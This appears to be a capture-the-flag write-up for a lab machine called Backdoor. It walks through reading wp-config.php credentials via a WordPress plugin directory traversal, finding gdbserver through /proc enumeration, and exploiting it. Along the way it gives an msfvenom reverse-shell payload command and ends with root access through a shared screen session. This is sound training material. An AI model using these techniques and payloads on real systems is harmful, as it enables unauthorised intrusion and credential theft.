# BACKDOOR | 10.10.11.125

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.11.125

### Ports and Services

![nmap](img/nmap.png)

#### 22 - SSH - OpenSSH 8.2p1 Ubuntu

Will come back to this if I find credentials.

#### 1337 - ?

nmap does not give me any info about this port...

#### 80 - HTTP - Apache httpd 2.4.41

A website using WordPress as a backend. Running `wpscan` does not seem to find anything amiss. I honestly have better luck just checking the `/wp-content/plugins` folder and going from there if it's visible. And there is a plugin there that turns out to have a [directory traversal](https://www.exploit-db.com/exploits/39575) vuln. Using that POC I was indeed able to grab the 'wp-config.php' file, inside which exists credentials for the Mysql DB running on localhost:

![wp-config.php](img/wp-config.png)

I was also able to pull down `/etc/passwd` which showed there is a user called 'user' on this box, but not much else. I googled port 1337 and all I learned is that it tends to be used by backdoors because it is the 'leet' port, but that's it. 

Continuing on with the LFI enumeration I followed the basic guides but could not find anything interesting.

Sadly, stuck on an easy box until I looked it up and learned something new. You can enumerate running processes on Linux if you have this kind of LFI. And there is obviously something running on port 1337 that I have not identified. So from [this page](https://www.netspi.com/blog/technical/web-application-penetration-testing/directory-traversal-file-inclusion-proc-file-system/) I found that I could enumerate running processes by appending `/proc/shced_debug` to the vulnerable URL, and then it returned a lot of data, including a list of running processes:

![/proc/sched_debug](img/sched-debug.png)

I scrolled through until I found a process that looks out of place, or that might refer to a command being run, and I found one:

![sh process](img/sh.png)

That is suspicious because it means a shell script could be running. Further enumerating it by appending `/proc/790/cmdline` (790 is the PID), I discover that this is the service that is running on port 1337:

![gdbserver running on port 1337](img/gdbserver.png)

It is possible to connect to the service if you open up gdb on your machine and then use the command `target remote 10.10.11.125:1337` - but then it grabs the `/bin/true` binary and starts debugging it, eventually crashing. So, don't do that.

## Exploitation - RCE in gdbserver

Instead, search for 'gdbserver' in searchsploit and find there is a version that has an RCE for it:

![RCE in gdbserver](img/gdbRCE.png)

### Exploit Method

I have copied the exploit to my working dir. Next I need to generate malicious shellcode using `msfvenom`:

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=6969 PrependFork=true -o koopa.bin

Then I start a listener, and run the exploit, cross my fingers.

And it fails. Over and over. And I do know that it is supposed to work. So unfortunately I have to resort to using a Metasploit module (exploit/multi/gdb/gdb_server/exec).

## Privilege Escalation - user > root

So, from my shitty metasploit position, I now have to escalate to root. I have uploaded my own shell so I can kind of escape msf, but not really.

### Further Enumeration

There are a lot of things running on this box, either by design or because I messed something up, but I threw pspy on the box and found an instance of GNU Screen running as root:

![GNU Screen session](img/screen.png)

Even better, it's running as a shared session, which means anyone can attach to it.

### Exploit method

The command to attach to the screen session as root is `screen -x root/<name of session>`. In this case the name is also root. So:

    screen -x root/root

![Screen session as root](img/root-shell.png)

## Conclusion

Kinda hated this box. Can't really say why. I think it was because the python exploit failed and I had to use Metasploit.

**Steps taken:**

* Discover LFI in WordPress plugin
* Use LFI to enumerate running processes on system, discover gdbserver
* Exploit vuln in gdbserver to get user shell
* Escalate to root via shared Gnu Screen session
